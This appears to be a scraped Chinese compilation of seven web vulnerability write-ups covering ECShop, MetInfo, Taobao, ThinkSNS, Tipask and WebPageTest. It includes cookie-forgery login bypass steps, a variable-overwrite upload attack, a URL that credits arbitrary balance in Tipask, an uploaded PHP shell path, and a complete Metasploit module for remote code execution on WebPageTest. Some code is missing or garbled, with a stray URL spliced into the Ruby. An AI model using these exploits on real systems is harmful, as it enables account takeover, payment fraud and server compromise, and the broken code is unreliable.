Discuz x1.5盗取任意用户cookie漏洞预警(精选7篇)由网友“jlc3887”投稿提供,以下是小编精心整理的Discuz x1.5盗取任意用户cookie漏洞预警,供大家参考借鉴,希望可以帮助到有需要的朋友。
篇1:Discuz x1.5盗取任意用户cookie漏洞预警
刚刚提交360没有通过,然后我就博客发布把。
就是这样的,谢谢大家了,
请注明来处
篇2:ECShop 2.7.2 任意用户登陆漏洞0day漏洞预警
由于最近项目需要, 查看了下商派最新发布的ECShop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显, 且低级漏洞,这个漏洞可以让任何人以任何用户身份登录到ECShop前台!
漏洞的影响
ECShop 2.7.2
ECShop 2.7.1 不受影响
漏洞的出现
漏洞出现在/include/init.php文件的512行左右, 代码如下:
ecshop 2.7.2 最新任意用户登录漏洞代码
从代码中可以看出, 当SESSION中不存在用户登录信息的时候, 会查看COOKIE中的$_COOKIE['ECS']['user_id']和$_COOKIE['ECS']['password']两个变量。如果 两个变量都不为空,则查询user表中user_id为$_COOKIE['ECS']['user_id']的用户, 如果该用户存在, 就直接置为登录状态。而对$_COOKIE['ECS']['password']在整个判断过程中并未进行使用。
大家都知道,COOKIE是可以伪造的,所以用工具轻松添加这个两个变量, 并设置$_COOKIE['ECS']['user_id']为有效值,即可以任意账户登录系统
相同的认证方式,在后台的代码(/admin/include/init.php:229)中却又有比较安全的验证方式, 代码如下:
ecshop 2.7.2 最新任意用户登录漏洞代码
这里不仅验证了后台用户ID的有效性, 还进一步验证了$_COOKIE['ECSCP']['admin_pass']的有效性, 这样就是比较完善的方式,
漏洞简单利用
打开由ecshop 2.7.2构建的商城系统, 当前为未登录状态
打开COOKIE编辑软件, 这里我用的FireFox的插件FireCookie
新建两个COOKIE变量:$_COOKIE['ECS']['user_id']和$_COOKIE['ECS']['password'], 如下图所示:
ecshop 2.7.2 最新任意用户登录漏洞利用
ecshop 2.7.2 最新任意用户登录漏洞利用
现在刷新页面, 你已经登录了, 登录的用户名显示在右上角
ecshop 2.7.2 最新任意用户登录漏洞利用成功
漏洞的修补
修复漏洞也很简单, 前面贴出的后台代码就是最好的例子,把/include/init.php 261行左右的if语句改为
if (!$row || (md5($row['password'] . $_CFG['hash_code']) != $_COOKIE['ECS']['password']))
观点
这个漏洞的出现主要是影响前台用户, 对网站服务器的安全性影响不大。当然结合其他漏洞或是社会工程学等的攻击,取得提权也不是不可能的。这里就不说了,各路高手可自由发挥:-)
这算是EC团队的一个严重失误吧,希望官方尽快修复。
篇3:MetInfov5.1.3 任意文件上传漏洞漏洞预警
MetInfo 23号发布了新版本5.1.5,修补了本文提到的漏洞,当然严格来说应该是任意变量覆盖漏洞....
ps:欢迎各种形式,首发t00ls.net
注:请勿利用本文内容从事一切非法活动,否则后果自负
author:my5t3ry
废话不多说,看代码:
include\common.inc.php20-39$db_settings=parse_ini_file(ROOTPATH.'config/config_db.php');@extract($db_settings);require_once ROOTPATH.'include/mysql_class.php';$db=newdbmysql;$db->dbconn($con_db_host,$con_db_id,$con_db_pass,$con_db_name);define('MAGIC_QUOTES_GPC',get_magic_quotes_gpc());isset($_REQUEST['GLOBALS'])&&exit('Access Error');require_once ROOTPATH.'include/global.func.php';foreach(array('_COOKIE','_POST','_GET')as$_request){foreach($$_requestas$_key=>$_value){$_key{0}!='_'&&$$_key=daddslashes($_value);}}$query=“select * from {$tablepre}config where name='met_tablename' and lang='metinfo'”;$mettable=$db->get_one($query);$mettables=explode('|',$mettable[value]);foreach($mettablesas$key=>$val){$tablename='met_'.$val;$$tablename=$tablepre.$val;}
metinfo系统通过查询数据库的{$tablepre}config表,并将获取的结果通过foreach循环初始化表名变量,其中的
是通过代码
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);
来初始化的,然后在系统中使用这样“SELECT * FROM $met_message where id=$id and lang='$lang'”的SQL查询数据库,
其中的$met_message变量就是前面foreach循环初始化的变量……
我们可以覆盖$tablepre变量使表名初始化失败,进而提交表名变量.....
我找了个后台的上传页面,通过覆盖变量绕过后台验证并且覆盖允许上传后缀列表,构造上传漏洞,
MetInfov5.1.3 任意文件上传漏洞漏洞预警
,
exp:任意文件上传
任意文件上传
篇4:淘宝欺诈及某模块XSS漏洞可窃取用户cookie漏洞预警
首先我们先来看下淘宝的XSS漏洞
淘宝装修可以调用第三方模块,这就意味着这个地三方模板如果存在漏洞甚至被入侵都可能牵连到淘宝店铺!
编辑第三方模块,加入XSS代码,然后店铺调用
打开店铺地址会直接跳转天猫首页,
第二个漏洞相对感觉更严重(个人认为)
用大号店铺来宣传小号,用小号店铺进行欺诈,骗钱以后逃之夭夭。
淘宝搜索QQ会员,第一页%90的卖家都有过欺诈行为,
先来看段聊天记录吧
再来看下这些人的信誉度,等级貌似都不低的样子
至此为止本人已经被骗了65元,联系2次客服,第一次客服说处理以后会给我一个满意的答复,第二次联系客服,客服说这个问题不在她的处理范围内,让我打电话咨询,我想说的是,因为这几十元没有人愿意来回折腾的,希望你们的用户体验做好!
漏洞证明:
第一个漏洞演示地址:
shop105046076.taobao.com/
修复方案:
这两个都不好处理,相对来说第一个如果对第三方模块控制好的话,还是可以解决的,
篇5:ThinkSNS又一个任意上传文件漏洞漏洞预警
某模块未对上传文件类型进行验证,可上传任意文件
代码产生位置
apps\wap\Lib\Action\IndexAction.class.php
263行
if(!empty($_FILES['pic']['name'])) { // 自动发一条图片微博
$data['pic'] = $_FILES['pic'];
$data['content'] = '图片分享';
$data['from'] = $this->_type_wap;
$res = api('Statuses')->data($data)->upload;
}
未对文件类型过滤
访问wap 模块
发一条微博并传图
firebug 地址
去掉small_然后访问
www.myhack58.com/data/uploads//1023/17/50865d481c217.php
修复方案:
对上传类型要进行检查
篇6:Tipask 2.0 任意充值漏洞漏洞预警
披露状态:
-06-24:积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-22:厂商已经主动忽略漏洞,细节向公众公开
简要描述:
系统未检查传入参数的有效性
详细说明:
function onaliapyback() {
if ($_GET['trade_status' ] == 'TRADE_SUCCESS') {
$credit2 = $_GET[ 'total_fee'] * $this->setting['recharge_rate' ];
$this->credit($this->user['uid' ], 0, $credit2, 0, “支付宝充值”);
$this->message( “充值成功” , “user/score” );
} else {
$this->message( “服务器繁忙,请稍后再试!” , 'STOP' );
}
}
直接传入total_fee既可
漏洞证明:
/?ebank/aliapyback.html&trade_status=TRADE_SUCCESS&total_fee=99
修复方案:
坐等忽略
篇7:WebPageTest任意php文件上传漏洞预警
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' =>“WebPageTest Arbitrary PHP File Upload”,
'Description' =>%q{
This module exploits a vulnerability found in WebPageTest's Upload Feature. By
default, the resultimage.phpfile does not verify the user-supplied item before
saving it to disk, and then places this item in the web directory accessable by
remote users. This flaw can be abused to gain remote code execution.
},
'License' =>MSF_LICENSE,
'Author' =>
[
'dun', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '83822'],
['EDB', '19790']
],
'Payload' =>
{
'BadChars' =>“\x00”
},
'DefaultOptions' =>
{
'ExitFunction' =>“none”
},
'Platform' =>['php'],
'Arch' =>ARCH_PHP,
'Targets' =>
[
['WebPageTest v2.6 or older', {}]
],
'Privileged' =>false,
'DisclosureDate' =>“Jul 13 2012”,
'DefaultTarget' =>0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
], self.class)
end
def check
peer = “#{rhost}:#{rport}”
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname(“#{target_uri.path}.”)
res1 = send_request_raw({'uri'=>“#{base}/index.php”})
res2 = send_request_raw({'uri'=>“#{base}/work/resultimage.php”})
if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
res2 and res2.code == 200
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def on_new_session(cli)
if cli.type != “meterpreter”
print_error(“No automatic cleanup for you. Please manually remove: #{@target_path}”)
return
end
cli.core.use(“stdapi”) if not cli.ext.aliases.include?(“stdapi”)
cli.fs.file.rm(@target_path)
print_status(“#{@target_path} removed”)
end
def exploit
peer = “#{rhost}:#{rport}”
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname(“#{target_uri.path}.”)
p = payload.encoded
fname = “blah.php”
data = Rex::MIME::Message.new
data.add_part(
“
'multipart/form-data', #Content Type
nil, #Transfer Encoding
”form-data; name=\“file\”; filename=\“#{fname}\”“ #Content Disposition
)
print_status(”#{peer} - Uploading payload (#{p.length.to_s} bytes)...“)
res = send_request_cgi({
'method' =>'POST',
'uri' =>”#{base}/work/resultimage.php“,
'ctype' =>”multipart/form-data; boundary=#{data.bound}“,
'data' =>data.to_s
})
if not res
print_error(”#{peer} - No response from host“)
return
end www.xxxxo.com
@target_path = ”#{base}/results/#{fname}“
print_status(”#{peer} - Requesting #{@target_path}“)
res = send_request_cgi({'uri'=>@target_path})
handler
if res and res.code == 404
print_error(”#{peer} - Payload failed to upload")
end
end
end
★ 网络安全教案
★ opera9.52使用ajax读取本地文件漏洞进一步利用漏洞预警
【Discuz x1.5盗取任意用户cookie漏洞预警(精选7篇)】相关文章:
Podcast Generator多个模块文件包含和任意文件删除漏洞2023-04-14
Wp暴目录漏洞全版本通杀漏洞预警2022-04-30
网站被入侵后需做的检测2023-07-10
教你熟知Cookies文件的欺骗2023-04-10
Cookies欺骗的艺术2023-09-24
Geeklog SECauthenticate函数SQL注入漏洞2022-12-16
上传漏洞终结篇讲解2022-10-05
xheditor默认upload.php畸形文件上传漏洞漏洞预警2023-07-28
dedecms 补出来的一个鸡肋漏洞漏洞预警2022-05-08
gallery是什么意思2022-12-05